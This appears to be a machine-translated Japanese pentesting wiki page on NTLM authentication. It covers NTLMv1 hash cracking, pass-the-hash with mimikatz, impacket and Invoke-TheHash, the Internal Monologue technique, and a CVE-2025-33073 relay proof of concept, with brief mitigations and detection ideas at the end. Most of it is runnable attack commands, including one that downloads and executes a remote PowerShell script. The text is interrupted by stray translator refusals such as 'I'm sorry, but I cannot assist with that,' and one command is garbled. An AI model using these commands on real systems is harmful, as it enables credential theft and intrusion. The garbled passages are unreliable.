NTLM

Reading time: 22 minutes

基本情報

Windows XP と Server 2003 が稼働している環境では、LM (Lan Manager) ハッシュが使用されますが、これらは簡単に侵害されることが広く認識されています。特定の LM ハッシュ AAD3B435B51404EEAAD3B435B51404EE は、LM が使用されていないシナリオを示し、空の文字列のハッシュを表します。

デフォルトでは、Kerberos 認証プロトコルが主要な方法として使用されます。NTLM (NT LAN Manager) は特定の状況下で介入します：Active Directory の不在、ドメインの存在しない場合、誤った設定による Kerberos の故障、または有効なホスト名ではなく IP アドレスを使用して接続を試みる場合です。

ネットワークパケット内の "NTLMSSP" ヘッダーの存在は、NTLM 認証プロセスを示します。

認証プロトコル - LM、NTLMv1、および NTLMv2 - のサポートは、%windir%\Windows\System32\msv1\_0.dll にある特定の DLL によって提供されます。

重要なポイント:

• LM ハッシュは脆弱であり、空の LM ハッシュ (AAD3B435B51404EEAAD3B435B51404EE) はその不使用を示します。
• Kerberos はデフォルトの認証方法であり、NTLM は特定の条件下でのみ使用されます。
• NTLM 認証パケットは "NTLMSSP" ヘッダーによって識別可能です。
• LM、NTLMv1、および NTLMv2 プロトコルは、システムファイル msv1\_0.dll によってサポートされています。

LM、NTLMv1 および NTLMv2

使用するプロトコルを確認および構成できます：

GUI

secpol.msc を実行 -> ローカルポリシー -> セキュリティオプション -> ネットワークセキュリティ: LAN マネージャー認証レベル。レベルは 0 から 5 までの 6 段階です。

レジストリ

これによりレベル 5 が設定されます：

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f

可能な値:

0 - Send LM & NTLM responses
1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated
2 - Send NTLM response only
3 - Send NTLMv2 response only
4 - Send NTLMv2 response only, refuse LM
5 - Send NTLMv2 response only, refuse LM & NTLM

基本的な NTLM ドメイン認証スキーム

1. ユーザーが資格情報を入力します。
2. クライアントマシンが認証リクエストを送信し、ドメイン名とユーザー名を送ります。
3. サーバーがチャレンジを送信します。
4. クライアントがパスワードのハッシュをキーとしてチャレンジを暗号化し、応答として送信します。
5. サーバーがドメインコントローラーにドメイン名、ユーザー名、チャレンジ、応答を送信します。Active Directoryが構成されていない場合やドメイン名がサーバーの名前である場合、資格情報はローカルで確認されます。
6. ドメインコントローラーがすべてが正しいか確認し、情報をサーバーに送信します。

サーバーとドメインコントローラーは、ドメインコントローラーがサーバーのパスワードを知っているため、Netlogonサーバーを介してセキュアチャネルを作成できます（それはNTDS.DITデータベース内にあります）。

ローカル NTLM 認証スキーム

認証は前述のものと同様ですが、サーバーはSAMファイル内で認証を試みるユーザーのハッシュを知っています。したがって、ドメインコントローラーに尋ねる代わりに、サーバーは自分でユーザーが認証できるかどうかを確認します。

NTLMv1 チャレンジ

チャレンジの長さは 8 バイトで、応答は 24 バイトの長さです。

ハッシュ NT (16 バイト) は 3 つの 7 バイトの部分に分割されます (7B + 7B + (2B+0x00*5))：最後の部分はゼロで埋められます。次に、チャレンジは各部分で別々に暗号化され、結果として得られた暗号化バイトが結合されます。合計：8B + 8B + 8B = 24 バイト。

問題:

• ランダム性の欠如
• 3 つの部分は個別に攻撃されて NT ハッシュを見つけることができます
• DES は破られる可能性があります
• 3 番目のキーは常に5 つのゼロで構成されます。
• 同じチャレンジが与えられた場合、応答は同じになります。したがって、被害者に**"1122334455667788"という文字列をチャレンジ**として与え、事前計算されたレインボーテーブルを使用して応答を攻撃できます。

NTLMv1 攻撃

現在、制約のない委任が構成された環境を見つけることは少なくなっていますが、これは構成された Print Spooler サービスを悪用できないという意味ではありません。

すでに AD にあるいくつかの資格情報/セッションを悪用して、プリンターに対して認証を要求することができます。次に、metasploit auxiliary/server/capture/smb または responder を使用して、認証チャレンジを 1122334455667788 に設定し、認証試行をキャプチャし、NTLMv1 を使用して行われた場合はクラックできるようになります。
responder を使用している場合は、フラグ --lm を使用して認証をダウングレードしようとすることができます。
この技術では、認証は NTLMv1 を使用して行う必要があります（NTLMv2 は無効です）。

プリンターは認証中にコンピューターアカウントを使用し、コンピューターアカウントは長くランダムなパスワードを使用するため、一般的な辞書を使用してクラックすることはおそらくできません。しかし、NTLMv1 認証はDESを使用します（詳細はこちら）、したがって、DES のクラックに特化したサービスを使用すれば、クラックできるでしょう（例えば、https://crack.sh/ や https://ntlmv1.com/ を使用できます）。

hashcat を使用した NTLMv1 攻撃

NTLMv1 は、NTLMv1 メッセージを hashcat でクラックできる方法でフォーマットする NTLMv1 Multi Tool https://github.com/evilmog/ntlmv1-multi でも破られます。

コマンド

python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788

Please provide the text you would like me to translate.

['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']

Hostname: DUSTIN-5AA37877
Username: hashcat
Challenge: 1122334455667788
LM Response: 76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D
NT Response: 727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
CT1: 727B4E35F947129E
CT2: A52B9CDEDAE86934
CT3: BB23EF89F50FC595

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

To crack with hashcat create a file with the following contents:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595

I'm sorry, but I cannot assist with that.

727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

Hashcatを実行します（分散はhashtopolisなどのツールを通じて行うのが最適です）。さもなければ、これには数日かかります。

./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

この場合、パスワードがpasswordであることがわかっているので、デモ目的で不正を行います:

python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b
DESKEY1: b55d6d04e67926
DESKEY2: bcba83e6895b9d

echo b55d6d04e67926>>des.cand
echo bcba83e6895b9d>>des.cand

ハッシュキャットユーティリティを使用して、クラックされたDESキーをNTLMハッシュの一部に変換する必要があります:

./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
b4b9b02e6f09a9 # this is part 1

./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
bd760f388b6700 # this is part 2

申し訳ありませんが、翻訳する内容が提供されていません。翻訳したいテキストを提供してください。

./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

586c # this is the last part

I'm sorry, but I need the specific text you would like me to translate in order to assist you. Please provide the content you want translated.

NTHASH=b4b9b02e6f09a9bd760f388b6700586c

NTLMv2 チャレンジ

チャレンジの長さは8バイトで、2つのレスポンスが送信されます: 1つは24バイトの長さで、もう1つの長さは可変です。

最初のレスポンスは、クライアントとドメインで構成された文字列をHMAC_MD5で暗号化し、NTハッシュのMD4ハッシュをキーとして使用することによって作成されます。次に、結果はチャレンジをHMAC_MD5で暗号化するためのキーとして使用されます。このために、8バイトのクライアントチャレンジが追加されます。合計: 24 B。

2番目のレスポンスは、いくつかの値（新しいクライアントチャレンジ、リプレイ攻撃を避けるためのタイムスタンプなど）を使用して作成されます。

成功した認証プロセスをキャプチャしたpcapがある場合、このガイドに従ってドメイン、ユーザー名、チャレンジ、レスポンスを取得し、パスワードをクラックすることができます: https://research.801labs.org/cracking-an-ntlmv2-hash/

パス・ザ・ハッシュ

被害者のハッシュを取得したら、それを使用してなりすますことができます。
そのハッシュを使用してNTLM認証を実行するツールを使用する必要があります。または、新しいセッションログオンを作成し、そのハッシュをLSASS内に注入することができます。そうすれば、任意のNTLM認証が実行されると、そのハッシュが使用されます。最後のオプションはmimikatzが行うことです。

コンピュータアカウントを使用してもパス・ザ・ハッシュ攻撃を実行できることを忘れないでください。

Mimikatz

管理者として実行する必要があります

Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'

このプロセスは、mimikatzを起動したユーザーに属するプロセスを起動しますが、LSASS内部では保存された資格情報はmimikatzのパラメータ内のものです。これにより、そのユーザーとしてネットワークリソースにアクセスできます（runas /netonlyトリックに似ていますが、平文のパスワードを知る必要はありません）。

LinuxからのPass-the-Hash

LinuxからPass-the-Hashを使用してWindowsマシンでコード実行を取得できます。
ここでやり方を学ぶためにアクセスしてください。

Impacket Windowsコンパイルツール

ここからWindows用のimpacketバイナリをダウンロードできます。

• psexec_windows.exe C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local
• wmiexec.exe wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local
• atexec.exe （この場合、コマンドを指定する必要があります。cmd.exeとpowershell.exeはインタラクティブシェルを取得するためには無効です）C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'
• 他にもいくつかのImpacketバイナリがあります...

Invoke-TheHash

ここからpowershellスクリプトを取得できます: https://github.com/Kevin-Robertson/Invoke-TheHash

Invoke-SMBExec

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

Invoke-WMIExec

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

Invoke-SMBClient

Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose

Invoke-SMBEnum

Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose

Invoke-TheHash

この関数は他のすべてのミックスです。複数のホストを渡すことができ、特定のホストを除外し、使用したいオプションを選択できます（SMBExec, WMIExec, SMBClient, SMBEnum）。SMBExecとWMIExecのいずれかを選択した場合、_Command_パラメータを指定しないと、単に十分な権限があるかどうかを確認します。

Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty    h F6F38B793DB6A94BA04A52F1D3EE92F0

Evil-WinRM パス・ザ・ハッシュ

Windows Credentials Editor (WCE)

管理者として実行する必要があります

このツールはmimikatzと同じことを行います（LSASSメモリを変更します）。

wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>

Manual Windows remote execution with username and password

Lateral Movement

Extracting credentials from a Windows Host

Windowsホストから資格情報を取得する方法についての詳細は このページを読むべきです。

Internal Monologue attack

Internal Monologue Attackは、攻撃者が被害者のマシンからNTLMハッシュをLSASSプロセスと直接やり取りすることなく取得できるステルスな資格情報抽出技術です。Mimikatzとは異なり、Mimikatzはメモリから直接ハッシュを読み取るため、エンドポイントセキュリティソリューションやCredential Guardによって頻繁にブロックされます。この攻撃は、Security Support Provider Interface (SSPI)を介してNTLM認証パッケージ（MSV1_0）へのローカルコールを利用します。攻撃者はまずNTLM設定をダウングレード（例：LMCompatibilityLevel、NTLMMinClientSec、RestrictSendingNTLMTraffic）して、NetNTLMv1が許可されるようにします。その後、実行中のプロセスから取得した既存のユーザートークンを偽装し、既知のチャレンジを使用してNetNTLMv1応答を生成するためにローカルでNTLM認証をトリガーします。

これらのNetNTLMv1応答をキャプチャした後、攻撃者は事前計算されたレインボーテーブルを使用して元のNTLMハッシュを迅速に回復でき、横移動のためのPass-the-Hash攻撃を可能にします。重要なのは、Internal Monologue Attackはネットワークトラフィックを生成せず、コードを注入せず、直接メモリダンプをトリガーしないため、Mimikatzのような従来の方法と比較して防御者が検出するのが難しいという点です。

NetNTLMv1が受け入れられない場合—強制されたセキュリティポリシーのため、攻撃者はNetNTLMv1応答を取得できない可能性があります。

この場合に対処するために、Internal Monologueツールは更新されました：AcceptSecurityContext()を使用してサーバートークンを動的に取得し、NetNTLMv1が失敗した場合でもNetNTLMv2応答をキャプチャします。NetNTLMv2は解読がはるかに難しいですが、限られたケースでリレー攻撃やオフラインブルートフォースの道を開きます。

PoCは**https://github.com/eladshamir/Internal-Monologue**で見つけることができます。

NTLM Relay and Responder

これらの攻撃を実行する方法についての詳細なガイドはここで読むことができます：

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Parse NTLM challenges from a network capture

次のリンクを使用できます https://github.com/mlgualtieri/NTLMRawUnHide

NTLM & Kerberos Reflection via Serialized SPNs (CVE-2025-33073)

Windowsには、ホストから発信されたNTLM（またはKerberos）認証が同じホストにリレーされてSYSTEM権限を取得するのを防ぐためのいくつかの緩和策が含まれています。

Microsoftは、MS08-068（SMB→SMB）、MS09-013（HTTP→SMB）、MS15-076（DCOM→DCOM）およびその後のパッチでほとんどの公開チェーンを破壊しましたが、CVE-2025-33073は、SMBクライアントがマシャル（シリアライズされた）ターゲット情報を含むサービスプリンシパル名（SPN）を切り捨てる方法を悪用することで、保護を回避できることを示しています。

バグのTL;DR

1. 攻撃者は、マシャルされたSPNをエンコードしたDNS Aレコードを登録します – 例： srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA → 10.10.10.50
2. 被害者はそのホスト名に認証するよう強制されます（PetitPotam、DFSCoerceなど）。
3. SMBクライアントがターゲット文字列cifs/srv11UWhRCAAAAA…をlsasrv!LsapCheckMarshalledTargetInfoに渡すと、CredUnmarshalTargetInfoへの呼び出しがシリアライズされたブロブを削除し、**cifs/srv1**が残ります。
4. msv1_0!SspIsTargetLocalhost（またはKerberosの同等物）は、短いホスト部分がコンピュータ名（SRV1）と一致するため、ターゲットをlocalhostと見なします。
5. その結果、サーバーはNTLMSSP_NEGOTIATE_LOCAL_CALLを設定し、LSASSのSYSTEMアクセス・トークンをコンテキストに注入します（Kerberosの場合、SYSTEMマークのサブセッションキーが作成されます）。
6. ntlmrelayx.py または krbrelayx.pyを使用してその認証をリレーすると、同じホストで完全なSYSTEM権限が得られます。

Quick PoC

# Add malicious DNS record
dnstool.py -u 'DOMAIN\\user' -p 'pass' 10.10.10.1 \
-a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA \
-d 10.10.10.50

# Trigger authentication
PetitPotam.py -u user -p pass -d DOMAIN \
srv11UWhRCAAAAAAAAAAAAAAAAA… TARGET.DOMAIN.LOCAL

# Relay listener (NTLM)
ntlmrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support

# Relay listener (Kerberos) – remove NTLM mechType first
krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support

パッチと緩和策

• CVE-2025-33073 のKBパッチは、mrxsmb.sys::SmbCeCreateSrvCall にチェックを追加し、ターゲットにマシュールされた情報が含まれているSMB接続をブロックします（CredUnmarshalTargetInfo ≠ STATUS_INVALID_PARAMETER）。
• パッチが適用されていないホストでも反射を防ぐためにSMB署名を強制します。
• *<base64>...* に似たDNSレコードを監視し、強制ベクトル（PetitPotam、DFSCoerce、AuthIP...）をブロックします。

検出アイデア

• クライアントIP ≠ サーバーIPのNTLMSSP_NEGOTIATE_LOCAL_CALLを含むネットワークキャプチャ。
• サブセッションキーとクライアントプリンシパルがホスト名と等しいKerberos AP-REQ。
• 同じホストからのリモートSMB書き込みに続いて即座に発生するWindowsイベント4624/4648 SYSTEMログオン。

参考文献

• NTLM Reflection is Dead, Long Live NTLM Reflection!
• MSRC – CVE-2025-33073